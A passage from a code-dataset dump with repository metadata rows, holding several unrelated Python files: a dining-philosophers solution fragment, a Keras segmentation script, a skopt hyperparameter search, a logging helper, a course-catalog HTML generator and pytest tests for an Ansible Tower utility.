pickRightFork: 'Callable[[], None]',
eat: 'Callable[[], None]',
putLeftFork: 'Callable[[], None]',
putRightFork: 'Callable[[], None]') -> None:
left = philosopher
right = (philosopher + 4) % 5
self.sem.acquire()
self.pickFork(left, pickLeftFork)
self.pickFork(right, pickRightFork)
eat()
self.putFork(right, putRightFork)
self.putFork(left, putLeftFork)
self.sem.release()
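# Usage sketch (a hypothetical demo, not part of the LeetCode harness): spawn one
# thread per philosopher and pass simple callables for the fork/eat actions.
if __name__ == '__main__':
    from threading import Thread
    table = DiningPhilosophers()
    def dine(i):
        noop = lambda: None
        table.wantsToEat(i, noop, noop,
                         lambda: print('philosopher %d eats' % i),
                         noop, noop)
    threads = [Thread(target=dine, args=(i,)) for i in range(5)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()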
| 31.029412 | 64 | 0.531754 | 100 | 1,055 | 5.56 | 0.42 | 0.107914 | 0.032374 | 0.05036 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005772 | 0.343128 | 1,055 | 33 | 65 | 31.969697 | 0.796537 | 0.054976 | 0 | 0.074074 | 0 | 0 | 0.090452 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.148148 | false | 0 | 0.037037 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5f7607972db8587d9fae4b2354ebcbe801fb37b | 4,151 | py | Python | ML/gtsdb/semantic_seg.py | PepSalehi/algorithms | 1c20f57185e6324aa840ccff98e69764b4213131 | [
"MIT"
] | null | null | null | ML/gtsdb/semantic_seg.py | PepSalehi/algorithms | 1c20f57185e6324aa840ccff98e69764b4213131 | [
"MIT"
] | null | null | null | ML/gtsdb/semantic_seg.py | PepSalehi/algorithms | 1c20f57185e6324aa840ccff98e69764b4213131 | [
"MIT"
] | 1 | 2019-12-09T21:40:46.000Z | 2019-12-09T21:40:46.000Z | #!/usr/bin/env python
"""Semantic Segmentation experiment."""
from keras.models import load_model
from keras.models import Model
from keras.layers import UpSampling2D
import scipy.misc
import numpy as np
from PIL import Image
import logging
import sys
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',
level=logging.DEBUG,
stream=sys.stdout)
def scale_array(x, new_size):
"""
Scale a numpy array.
Parameters
----------
x : numpy array
new_size : tuple
Returns
-------
scaled array
"""
min_el = np.min(x)
max_el = np.max(x)
y = scipy.misc.imresize(x, new_size, mode='L', interp='nearest')
y = y / 255.0 * (max_el - min_el) + min_el
return y
def get_overlay_name(segmentation_name):
splitted = segmentation_name.split('.')
splitted[-2] = splitted[-2] + '-overlay'
output_path = '.'.join(splitted)
return output_path
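# Example of the name transformation performed above (doctest-style illustration):
#   get_overlay_name('segmentations/3.png') -> 'segmentations/3-overlay.png'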
def overlay_images(original_image,
segmentation_image,
hard_classification=True):
"""
Overlay original_image with segmentation_image.
Store the result with the same name as segmentation_image, but with
`-overlay` appended to the file name.
Parameters
----------
original_image : string
Path to an image file
segmentation_image : string
Path to an image file of the same size as original_image
hard_classification : bool
If True, the image will only show either street or no street.
If False, the image will show probabilities.
"""
background = Image.open(original_image)
overlay = Image.open(segmentation_image)
overlay = overlay.convert('RGB')
# Replace colors of segmentation to make it easier to see
street_color = (255, 255, 255)
width, height = overlay.size
pix = overlay.load()
pixels_debug = list(overlay.getdata())
logging.info('%i colors in classification (min=%s, max=%s)',
len(list(set(pixels_debug))),
min(pixels_debug),
max(pixels_debug))
for x in range(0, width):
for y in range(0, height):
if not hard_classification:
overlay.putpixel((x, y), (0, pix[x, y][0], 0))
else:
if pix[x, y] == street_color:
overlay.putpixel((x, y), (0, 255, 0))
else:
overlay.putpixel((x, y), (0, 0, 0))
background = background.convert('RGBA')
overlay = overlay.convert('RGBA')
new_img = Image.blend(background, overlay, 0.5)
# get new name
output_path = get_overlay_name(segmentation_image)
new_img.save(output_path, 'PNG')
model = load_model("gtsdb-fully.h5")
# model.layers.pop() # Get rid of the classification layer softmax
# model.layers.pop() # Get rid of the classification layer softmax
# model.outputs = [model.layers[-1].output]
# model.output_layers = [model.layers[-1]] # added this line in addition to zo7 solution
# model.layers[-1].outbound_nodes = []
# model.summary()
# Get input
# new_input = model.input
# new_input.input_shape = (1, None, None, 3)
# # Find the layer to connect
# # hidden_layer = model.layers[-1].output
# # # Connect a new layer on it
# # new_output = Dense(2)(hidden_layer)
# # Build a new model
# model2 = Model(new_input, hidden_layer)
model.add(UpSampling2D((2, 2))) # Deconvolution2D
model.add(UpSampling2D((2, 2))) # Deconvolution2D - (333, 193)
model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=["accuracy"])
model.summary()
original_image = "00072.ppm"
img = scipy.misc.imread(original_image)
img = np.array(img, dtype=np.float32)
img /= 255.0
# scipy.misc.imshow(img)
img_shape = img.shape[:2]
img = img.reshape([1] + list(img.shape))
pred = model.predict(img)
pred = pred[0].transpose((2, 1, 0))
for i, layer in enumerate(pred):
print(layer.shape)
layer = scale_array(layer, img_shape)
segmentation_fname = 'segmentations/{}.png'.format(i)
scipy.misc.imsave(segmentation_fname, layer)
overlay_images(original_image, segmentation_fname)
| 29.863309 | 89 | 0.642255 | 551 | 4,151 | 4.720508 | 0.330309 | 0.039985 | 0.004614 | 0.019608 | 0.119569 | 0.069589 | 0.041138 | 0.041138 | 0.041138 | 0.041138 | 0 | 0.02262 | 0.233197 | 4,151 | 138 | 90 | 30.07971 | 0.794533 | 0.317755 | 0 | 0.056338 | 0 | 0 | 0.071243 | 0.008905 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042254 | false | 0 | 0.112676 | 0 | 0.183099 | 0.014085 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5f9b4599ddcdfb832a2be6e8ad579044c33aff5 | 7,052 | py | Python | core/hyperparameter_search.py | vishal-keshav/style_transfer | 683a43c39ee8740c9172d2653a112a91a4db8750 | [
"MIT"
] | null | null | null | core/hyperparameter_search.py | vishal-keshav/style_transfer | 683a43c39ee8740c9172d2653a112a91a4db8750 | [
"MIT"
] | null | null | null | core/hyperparameter_search.py | vishal-keshav/style_transfer | 683a43c39ee8740c9172d2653a112a91a4db8750 | [
"MIT"
] | null | null | null | """
Hyper-parameter search based on Bayesian optimization (Gaussian processes).
The scikit-learn-based library skopt implements the optimizer.
On top of it, we build an easy-to-execute hyper-parameter search
that runs before we start the full-blown training.
"""
import skopt
from skopt import gp_minimize, forest_minimize
from skopt.space import Real, Categorical, Integer
from skopt.plots import plot_convergence
from skopt.plots import plot_objective, plot_evaluations
#from skopt.plots import plot_histogram, plot_objective_2D
from skopt.utils import use_named_args
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
import math
import os
import sys
import importlib
def get_hyper_parameters(version, project_path, get_param_space = True):
import hyperparameter.hyperparameter as hp
hp_obj = hp.HyperParameters(version, project_path)
param_dict = hp_obj.get_params()
if get_param_space:
param_dict_space = hp_obj.get_param_space()
return param_dict, param_dict_space
else:
return param_dict
def set_hyper_parameter(version, project_path, dict):
import hyperparameter.hyperparameter as hp
hp_obj = hp.HyperParameters(version, project_path)
for key, value in dict.items():
hp_obj.set_parameter(key, value)
hp_obj.dump_parameter()
default_param_name = []
default_param_value = []
space_dimensions = []
args = None
def sanity_check(param_dict, param_dict_space):
global default_param_name
global default_param_value
global space_dimensions
for key, value in param_dict.items():
if key in param_dict_space.keys():
default_param_name.append(key)
default_param_value.append(value)
param_space = param_dict_space[key]
if param_space["type"] == "Int":
temp_skopt_var = Integer(low=param_space["low"], high=param_space["high"], name=str(key))
elif param_space["type"] == "Real":
temp_skopt_var = Real(low=param_space["low"], high=param_space["high"], prior=param_space["prior"], name=str(key))
else:
temp_skopt_var = Categorical(categories=param_space["catagories"], name=str(key))
space_dimensions.append(temp_skopt_var)
else:
print(key + " has no space defined in param_space")
return
#TODO create a dataprovider that works on a sample of data
def get_data_provider(dataset, project_path, param_dict):
data_provider_module_path = "dataset." + dataset + ".data_provider"
data_provider_module = importlib.import_module(data_provider_module_path)
dp_obj = data_provider_module.get_obj(project_path)
with tf.name_scope('input'):
img_batch = tf.placeholder(tf.float32, [None, 28, 28, 1])
with tf.name_scope('output'):
label_batch = tf.placeholder(tf.int64, [None, 10])
return img_batch, label_batch, dp_obj
def get_model(version, inputs, param_dict):
model_module_path = "architecture.version" + str(version) + ".model"
model_module = importlib.import_module(model_module_path)
model = model_module.create_model(inputs, param_dict)
return model
def optimisation(label_batch, logits, param_dict):
with tf.name_scope('loss'):
loss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
labels=label_batch, logits=logits))
tf.summary.scalar('loss', loss_op)
with tf.name_scope('gradient_optimisation'):
gradient_optimizer_op = tf.train.AdamOptimizer(param_dict['learning_rate'])
gd_opt_op = gradient_optimizer_op.minimize(loss_op)
return loss_op, gd_opt_op
def accuracy(predictions, labels):
with tf.name_scope('accuracy'):
correct_prediction = tf.equal(tf.argmax(predictions, 1), tf.argmax(labels,1))
accuracy = 100*tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar('accuracy', accuracy)
return accuracy
def mk_dir(path):
if not os.path.isdir(path):
os.mkdir(path)
def log_file_suffix(params):
file_suffix = ""
for elem in params:
file_suffix = file_suffix + "_" + str(elem)
return file_suffix
def fitness(param_space_values):
# Here we re-create the param dictionary
project_path = os.getcwd()
param_dict = {}
for i in range(len(param_space_values)):
param_dict[default_param_name[i]] = param_space_values[i]
# The rest of the parameters live in param.txt
param_dict_original = get_hyper_parameters(args.param, project_path, False)
for key, value in param_dict_original.items():
if key not in param_dict.keys():
param_dict[key] = value
########### param_dict creation complete ################
# Define the data provider module
img_batch, label_batch, dp = get_data_provider(args.dataset, project_path, param_dict)
dp.set_batch(param_dict['BATCH_SIZE'])
# Construct a model to be trained
model = get_model(args.model, img_batch, param_dict)
# Define optimization procedure
logits = model['feature_logits']
output_probability = model['feature_out']
loss_op, gd_opt_op = optimisation(label_batch, logits, param_dict)
# Define accuracy operation
accuracy_op = accuracy(output_probability, label_batch)
# Merge all summaries
summary_op = tf.summary.merge_all()
summary_path = project_path + "/debug/opt_" + str(args.model) + \
"_" + str(args.param) + "_" + args.dataset
# Start a session
with tf.Session() as sess:
train_writer = tf.summary.FileWriter(summary_path + '/' + log_file_suffix(param_space_values), sess.graph)
sess.run(tf.global_variables_initializer())
for nr_epochs in range(param_dict['NUM_EPOCHS']):
for i in range(5):
img_batch_data, label_batch_data = dp.next()
feed_dict = {img_batch: img_batch_data, label_batch: label_batch_data}
_, out, loss, accu, summary = sess.run([gd_opt_op,output_probability,loss_op, accuracy_op, summary_op], feed_dict = feed_dict)
train_writer.add_summary(summary, nr_epochs*10 + i)
train_writer.close()
tf.reset_default_graph()
print(accu)
return -accu
def execute(arguments):
global args
args = arguments
project_path = os.getcwd()
param_dict, param_dict_space = get_hyper_parameters(args.param, project_path)
sanity_check(param_dict, param_dict_space)
if not default_param_name:
print("Fix your param, exiting")
sys.exit()
search_result = gp_minimize(func=fitness,
dimensions=space_dimensions,
acq_func='EI',
n_calls=20,
x0=default_param_value)
print("Best parameters has been searched")
best_results = search_result.x
param_dict_opt = param_dict
for i in range(len(default_param_name)):
param_dict_opt[default_param_name[i]] = best_results[i]
set_hyper_parameter(args.param, project_path, param_dict_opt)
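# Usage sketch (assumption: `args` mirrors the CLI namespace this module expects;
# the attribute names `param`, `dataset` and `model` are taken from the code above,
# but the values are purely illustrative):
#
#   from types import SimpleNamespace
#   arguments = SimpleNamespace(param=1, dataset='mnist', model=1)
#   execute(arguments)   # runs gp_minimize over the declared parameter space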
| 41.239766 | 142 | 0.698242 | 960 | 7,052 | 4.836458 | 0.254167 | 0.067844 | 0.021107 | 0.016153 | 0.19384 | 0.124704 | 0.089166 | 0.048245 | 0.033599 | 0.033599 | 0 | 0.004471 | 0.207033 | 7,052 | 170 | 143 | 41.482353 | 0.825823 | 0.0865 | 0 | 0.064286 | 0 | 0 | 0.049234 | 0.003282 | 0 | 0 | 0 | 0.005882 | 0 | 1 | 0.078571 | false | 0 | 0.121429 | 0 | 0.264286 | 0.028571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5fadfef73f91b4b1d12fd13f34f96e38ed68ff7 | 2,105 | py | Python | mop/vendor/node_calculator/logger.py | HolisticCoders/mop | dc464021c7e69975fa9fcc06595cc91113768e5e | [
"MIT"
] | 8 | 2019-09-21T07:17:54.000Z | 2022-02-09T03:33:24.000Z | mop/vendor/node_calculator/logger.py | ProjectBorealis/master-of-puppets | dc464021c7e69975fa9fcc06595cc91113768e5e | [
"MIT"
] | 102 | 2019-01-10T21:00:28.000Z | 2019-03-28T11:32:45.000Z | mop/vendor/node_calculator/logger.py | HolisticCoders/mop | dc464021c7e69975fa9fcc06595cc91113768e5e | [
"MIT"
] | 3 | 2020-01-12T01:37:34.000Z | 2021-10-08T11:34:08.000Z | """Module for logging.
:author: Mischa Kolbe <mik@dneg.com>
:credits: Steven Bills, Mischa Kolbe
"""
import logging
import logging.handlers
log = logging.getLogger(__name__)
# Make sure logs don't propagate through to __main__ logger, too
# This might be a Maya-issue. I don't think this should be necessary!
log.propagate = False
FORMAT_STR = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
FORMATTER = logging.Formatter(FORMAT_STR, "%m/%d/%Y %H:%M:%S")
class NullHandler(logging.Handler):
"""Basic custom logging handler."""
def emit(self, record):
pass
def clear_handlers():
"""Reset handlers of logger.
Note:
This prevents creating multiple handler copies when using reload(logger).
"""
log.handlers = []
null_handler = NullHandler()
log.addHandler(null_handler)
def setup_stream_handler(level=logging.INFO):
"""Create a stream handler for logging.
Note:
Logging levels are: DEBUG, INFO, WARN, ERROR, CRITICAL
Args:
level (int): Desired logging level. Default is logging.INFO.
"""
strmh = logging.StreamHandler()
strmh.setFormatter(FORMATTER)
strmh.setLevel(level)
log.addHandler(strmh)
if log.getEffectiveLevel() > level:
log.setLevel(level)
def setup_file_handler(file_path, max_bytes=100 << 20, level=logging.INFO):
"""Creates a rotating file handler for logging.
Default level is info.
Args:
file_path (str): Path where to save the log to.
max_bytes (int): Maximum size of output file.
level (int): Desired logging level. Default is logging.INFO.
max_bytes:
x << y returns x with the bits shifted to the left by y places; 100 << 20 == 100 * 2 ** 20
"""
file_handler = logging.handlers.RotatingFileHandler(
file_path,
maxBytes=max_bytes,
backupCount=10
)
file_handler.setFormatter(FORMATTER)
file_handler.setLevel(level)
log.addHandler(file_handler)
if log.getEffectiveLevel() > level:
log.setLevel(level)
log.info("Log file: {0}".format(file_path))
| 25.361446 | 95 | 0.671259 | 275 | 2,105 | 5.032727 | 0.447273 | 0.047688 | 0.034682 | 0.031792 | 0.130058 | 0.130058 | 0.130058 | 0.067919 | 0.067919 | 0 | 0 | 0.011543 | 0.218052 | 2,105 | 82 | 96 | 25.670732 | 0.829283 | 0.422328 | 0 | 0.125 | 0 | 0 | 0.073149 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.03125 | 0.0625 | 0 | 0.21875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5fbbbfef06dbcd8508e8e7c4079399f3e8df5f6 | 10,157 | py | Python | src/catalog_engine_v2/template_v2.py | rxng8/Gettysburg-Course-Crawling-System | ba8a4d4b7beec0ed8554d8d9d8c57f26750463ec | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/catalog_engine_v2/template_v2.py | rxng8/Gettysburg-Course-Crawling-System | ba8a4d4b7beec0ed8554d8d9d8c57f26750463ec | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/catalog_engine_v2/template_v2.py | rxng8/Gettysburg-Course-Crawling-System | ba8a4d4b7beec0ed8554d8d9d8c57f26750463ec | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | """ @author: Alex Nguyen
@file: template_v2.py
This file extracts the information from the template.
"""
import os
import pickle  # needed by __save_id_to_page_data below
from typing import Dict, List
import bs4
from bs4 import BeautifulSoup
from datetime import date
from .const import *
from .page import Page
from .utils import load_json_locators, request_json_from_api
from .explorer import CourseExplorer, CoursePage, CoursePage_v2
class Template:
""" This class is the template extractor
"""
def __init__(
self,
template_path: str,
locators_path: str,
course_crawling_mode=COURSE_CRAWLING_MODE.raw,
course_explorer: CourseExplorer = None,
data_path: str=None,
verbose=True
) -> None:
""" initializer
Args:
template_path (str): Path to template file. Defaults to '../data/template.html'.
"""
self.template_path = template_path
self.locators_path = locators_path
self.n_links = 0
self.toc: str = ""
self.pages = []
self.title = ""
self.course_crawling_mode = course_crawling_mode # either "api" or "raw"
self.course_explorer = course_explorer
self.verbose = verbose
self.locators_data = self.__load_locators()
self.template_src = self.__read_template_file(self.template_path)
self.data_path = data_path
if not os.path.exists(data_path):
os.mkdir(data_path)
# The actual data
self.id_to_page: Dict[str, Page] = {}
def __read_template_file(self, path) -> str:
src = ""
with open(path, "rb") as f:
src = f.read()
if not src:
if self.verbose:
print("Cannot read template file")
return None
return src
def __load_locators(self) -> Dict:
data = load_json_locators(self.locators_path)
# TODO: check if locators is a proper structure
if data:
return data
return None
def insight(self):
# TODO: Currently reaching maximum recursion depth, CAUSING ERROR
# id_to_page_path = os.path.join(self.data_path, DEFAULT_SAVED_PICKLE_PAGE_DATA_FILE_NAME)
# # If the data exists, no need to crawl any more
# if os.path.exists(id_to_page_path):
# with open(id_to_page_path, "rb") as f:
# self.id_to_page = pickle.load(f)
# print("The data exists, simply load the data.")
# return
soup = BeautifulSoup(self.template_src, 'html.parser')
header_soup = BeautifulSoup(self.template_src, 'html.parser').body.find("header")
toc_soup = BeautifulSoup(self.template_src, 'html.parser').body.find("nav")
all_content_soup = BeautifulSoup(self.template_src, 'html.parser').body.find("main")
for i, section in enumerate(all_content_soup.find_all("section")):
# Loop through every elements
first_tag_pointer = section.find_all()[0]
current_page_header: bs4.BeautifulSoup = first_tag_pointer
for j, tag in enumerate(first_tag_pointer.find_next_siblings()):
# print(f"section: {i}, tag {j}: {tag}")
# If it is contained in a div, then it is a link
if tag.name == 'div':
assert "id" in current_page_header.attrs, "Unexpected error: Wrong current_page_header behavior!"
# Get the code html tag that contain the link for content to be replaced there!
url_code_block = tag.find("code")
# Because there can be a short_version text that does not require content to be there, we don't necessarily force
# it to always have the link there.
if url_code_block != None:
url = url_code_block.find("a") # Get the first and only link in the code html block
# Create a page
this_page = Page(
page_tag=PAGE_TAG.COURSE_PROG,
html_id=current_page_header["id"],
header_level=current_page_header.name,
locators_data=self.locators_data,
url=url["href"]
)
self.id_to_page[current_page_header["id"]] = this_page
if self.verbose:
print(this_page)
# Otherwise, it is a header
else:
current_page_header = tag
# print(current_page_header)
# Save the pickle serialized data inside the data folder
# TODO: Currently reaching maximum recursion depth, CAUSING ERROR
# self.__save_id_to_page_data()
def clear_cached_data(self):
id_to_page_path = os.path.join(self.data_path, DEFAULT_SAVED_PICKLE_PAGE_DATA_FILE_NAME)
if os.path.exists(id_to_page_path):
os.remove(id_to_page_path)
def __save_id_to_page_data(self):
id_to_page_path = os.path.join(self.data_path, DEFAULT_SAVED_PICKLE_PAGE_DATA_FILE_NAME)
with open(id_to_page_path, "wb") as f:
pickle.dump(self.id_to_page, f)
def show_temporary_result(self) -> None:
""" Show the user the webdriver of the resulted generated website
"""
# Driver - which can show the website temporarily using seleniums - class involved?
pass
def generate(self) -> str:
soup = BeautifulSoup(self.template_src, 'html.parser')
header_soup = BeautifulSoup(self.template_src, 'html.parser').body.find("header")
toc_soup = BeautifulSoup(self.template_src, 'html.parser').body.find("nav")
all_content_soup = BeautifulSoup(self.template_src, 'html.parser').body.find("main")
for i, section in enumerate(all_content_soup.find_all("section")):
# Loop through every elements
first_tag_pointer = section.find_all()[0]
current_course_subject: str = None
current_page_header: bs4.BeautifulSoup = first_tag_pointer
for j, tag in enumerate(first_tag_pointer.find_next_siblings()):
# If it is contained in a div, then it is a link
if tag.name == 'div':
if current_page_header.text.strip().split()[-1] == "Courses": # If this is course crawling, we have two cases
if self.course_crawling_mode == COURSE_CRAWLING_MODE.api:
# TODO: Working on course crawling api here
# Exclude the link
tag_link = tag.find("code")
# if there is no link (no `code` html tag), we can keep that content as part of
# the current tag and continue
if tag_link == None:
continue
# do work
tag_link.extract()
# CoursePage v1, create course page based on the subject name
# Create a new course page (department name)
# NOTE: CoursePage v1 deprecated.
# course_page = CoursePage(subject_name=current_course_subject, data=self.course_explorer.data)
# CoursePage v2, create course page based on list of subject area abbreviation
# First of all, get all the subject abbreviation in the content page
subject_abbrs: List[str] = self.id_to_page[current_page_header["id"]].get_subject_abbrs()
# Second, get from the actual page content
course_page_v2 = CoursePage_v2(subject_abbrs=subject_abbrs, data=self.course_explorer.data)
# for page_child_tag in course_page.gen_all_courses_for_this_subject().find_all(recursive=False):
# tag.append(page_child_tag)
for page_child_tag in course_page_v2.gen_all_courses_for_this_subject().find_all(recursive=False):
tag.append(page_child_tag)
elif self.course_crawling_mode == COURSE_CRAWLING_MODE.raw:
# We are generating based on raw html crawled pages
if current_page_header["id"] in self.id_to_page.keys():
# Exclude the link
tag_link = tag.find("code")
tag_link.extract()
# Append the content of that page into the children list of the tag
# tag.append(self.id_to_page[current_page_header["id"]].generate())
# Append each piece of the content of that page into the children list of the tag
for page_child_tag in self.id_to_page[current_page_header["id"]].generate().find_all(recursive=False):
tag.append(page_child_tag)
else: # else, we have one case!
if current_page_header["id"] in self.id_to_page.keys():
# Exclude the link
tag_link = tag.find("code")
tag_link.extract()
# Append the content of that page into the children list of the tag
# tag.append(self.id_to_page[current_page_header["id"]].generate())
# Append each piece of the content of that page into the children list of the tag
for page_child_tag in self.id_to_page[current_page_header["id"]].generate().find_all(recursive=False):
tag.append(page_child_tag)
# Otherwise, it is a header
else:
current_page_header = tag
# print(self.course_explorer.subjects_dict)
# print(f"Searching {tag.text.strip()} to {self.course_explorer.subjects_dict.keys()} => {tag in self.course_explorer.subjects_dict.keys()}")
if tag.text.strip() in self.course_explorer.subjects_dict.keys():
current_course_subject = tag.text.strip()
# print(current_course_subject)
original_html_string = \
"""
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="utf-8" />
<title>Gettysburg College Course Catalog 2021–2022</title>
</head>
<body></body>
</html>
"""
main_soup = BeautifulSoup(original_html_string, "html.parser")
# Modify the date variable header_soup
# https://www.programiz.com/python-programming/datetime/current-datetime
today = date.today()
# Textual month, day and year
today_string = today.strftime(r"%B %d, %Y")
header_soup_content_list = header_soup.find("section").find_all(recursive=False)
header_soup_content_list[len(header_soup_content_list) - 1].string = f" generated on {today_string}."
main_soup.body.append(header_soup)
main_soup.body.append(toc_soup)
main_soup.body.append(all_content_soup)
return main_soup
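# Usage sketch (paths are hypothetical; COURSE_CRAWLING_MODE is imported from
# .const above, and `explorer` stands for a prepared CourseExplorer instance,
# which generate() needs for its subject lookups):
#
#   template = Template(
#       template_path='../data/template.html',
#       locators_path='../data/locators.json',
#       course_crawling_mode=COURSE_CRAWLING_MODE.raw,
#       course_explorer=explorer,
#       data_path='../data/cache')
#   template.insight()             # crawl every linked page into Page objects
#   soup = template.generate()     # splice the crawled content into the template
#   with open('catalog.html', 'w') as f:
#       f.write(str(soup))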
| 39.216216 | 151 | 0.653146 | 1,382 | 10,157 | 4.559334 | 0.198263 | 0.013331 | 0.026662 | 0.024758 | 0.466116 | 0.431519 | 0.419775 | 0.374068 | 0.334074 | 0.334074 | 0 | 0.003437 | 0.255292 | 10,157 | 259 | 152 | 39.216216 | 0.829455 | 0.314857 | 0 | 0.320611 | 0 | 0 | 0.047228 | 0 | 0 | 0 | 0 | 0.007722 | 0.007634 | 1 | 0.061069 | false | 0.007634 | 0.068702 | 0 | 0.175573 | 0.015267 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
680131fc1bf24ebbce1221dc1343787c98373c6a | 8,140 | py | Python | test/test_atacac/test__utils.py | europ/aacac | ec73114d61358f28e937970adc43f7433eb0006e | [
"MIT"
] | 7 | 2020-05-05T14:42:57.000Z | 2020-12-15T11:22:08.000Z | test/test_atacac/test__utils.py | europ/aacac | ec73114d61358f28e937970adc43f7433eb0006e | [
"MIT"
] | 5 | 2020-05-19T12:34:51.000Z | 2020-08-05T11:14:17.000Z | test/test_atacac/test__utils.py | europ/aacac | ec73114d61358f28e937970adc43f7433eb0006e | [
"MIT"
] | 2 | 2020-09-14T09:12:19.000Z | 2021-04-13T10:11:22.000Z | import re
import tempfile
import textwrap
from unittest import mock
import click
import pytest
import yaml
from atacac import _utils
@pytest.mark.parametrize(
"level, fatal",
[
pytest.param("info", True, id="level='info', fatal"),
pytest.param("INFO", True, id="level='INFO', fatal"),
pytest.param("info", False, id="level='info'"),
pytest.param("INFO", False, id="level='INFO'"),
pytest.param("warn", True, id="level='warn', fatal"),
pytest.param("WARN", True, id="level='WARN', fatal"),
pytest.param("warn", False, id="level='warn'"),
pytest.param("WARN", False, id="level='WARN'"),
pytest.param("warning", True, id="level='warning', fatal"),
pytest.param("WARNING", True, id="level='WARNING', fatal"),
pytest.param("warning", False, id="level='warning'"),
pytest.param("WARNING", False, id="level='WARNING'"),
pytest.param("error", True, id="level='error', fatal"),
pytest.param("ERROR", True, id="level='ERROR', fatal"),
pytest.param("error", False, id="level='error'"),
pytest.param("ERROR", False, id="level='ERROR'"),
pytest.param("debug", True, id="level='debug', fatal"),
pytest.param("DEBUG", True, id="level='DEBUG', fatal"),
pytest.param("debug", False, id="level='debug'"),
pytest.param("DEBUG", False, id="level='DEBUG'"),
]
)
@mock.patch("atacac._utils.textwrap")
@mock.patch("atacac._utils.click")
def test_log(mock_click, mock_textwrap, level, fatal):
message = "This is a message."
mock_click.Abort = click.Abort
mock_click.style.return_value = level
mock_textwrap.indent.return_value = f"{level} {message}"
try:
_utils.log(level, message, fatal=fatal)
mock_click.echo.assert_called_once()
mock_click.echo.assert_called_with(f"{level} {message}")
except click.Abort:
assert fatal is True
@pytest.mark.parametrize(
"error, asset_type, query",
[
pytest.param(None, "user", ("label", 1), id="user"),
pytest.param(None, "organization", ("label", 1), id="organization"),
pytest.param(None, "team", ("label", 1), id="team"),
pytest.param(None, "credential_type", ("label", 1), id="credential_type"),
pytest.param(None, "credential", ("label", 1), id="credential"),
pytest.param(None, "notification_template", ("label", 1), id="notification_template"),
pytest.param(None, "inventory_script", ("label", 1), id="inventory_script"),
pytest.param(None, "project", ("label", 1), id="project"),
pytest.param(None, "inventory", ("label", 1), id="inventory"),
pytest.param(None, "job_template", ("label", 1), id="job_template"),
pytest.param(None, "workflow", ("label", 1), id="workflow"),
pytest.param("Unsupported asset type 'ABC123XYZ'!",
"ABC123XYZ", ("label", 1), id="unsupported asset type")
]
)
@mock.patch("tower_cli.get_resource")
def test_tower_list(mock_get_resource, error, asset_type, query):
result_assets = [{"id": 1, "name": "foo"}, {"id": 2, "name": "bar"}]
mock_instance = mock_get_resource.return_value
mock_instance.list.return_value = {"results": result_assets}
try:
retval = _utils.tower_list(asset_type, query)
except _utils.Error as e:
assert str(e) == error
assert e.error_code == 1
else:
mock_get_resource.assert_called_once()
mock_get_resource.assert_called_with(asset_type)
mock_instance.list.assert_called_once()
mock_instance.list.assert_called_with(all_pages=True, query=("label", 1))
assert retval == result_assets
@mock.patch("atacac._utils.tower_receive")
@mock.patch("atacac._utils.tower_list")
def test_tower_list_all(mock_tower_list, mock_tower_receive):
def tower_list(asset_type, query):
return [{'id': 1, 'name': f'Example {asset_type}'}]
mock_tower_list.side_effect = tower_list
mock_tower_receive.return_value = [
{
'project': 'Example project',
'inventory': 'Example inventory',
},
]
result = _utils.tower_list_all([('label', 1)])
assert list(sorted(result, key=lambda i: i['name'])) == [
{'id': 1, 'type': 'inventory', 'name': 'Example inventory'},
{'id': 1, 'type': 'job_template', 'name': 'Example job_template'},
{'id': 1, 'type': 'project', 'name': 'Example project'},
]
mock_tower_list.assert_has_calls([
mock.call('job_template', [('label', 1)]),
mock.call('project', [('name', 'Example project')]),
mock.call('inventory', [('name', 'Example inventory')]),
])
@pytest.mark.parametrize(
"error, asset_type, asset_name",
[
pytest.param(None, "user", "file", id="user"),
pytest.param(None, "organization", "file", id="organization"),
pytest.param(None, "team", "file", id="team"),
pytest.param(None, "credential_type", "file", id="credential_type"),
pytest.param(None, "credential", "file", id="credential"),
pytest.param(None, "notification_template", "file", id="notification_template"),
pytest.param(None, "inventory_script", "file", id="inventory_script"),
pytest.param(None, "project", "file", id="project"),
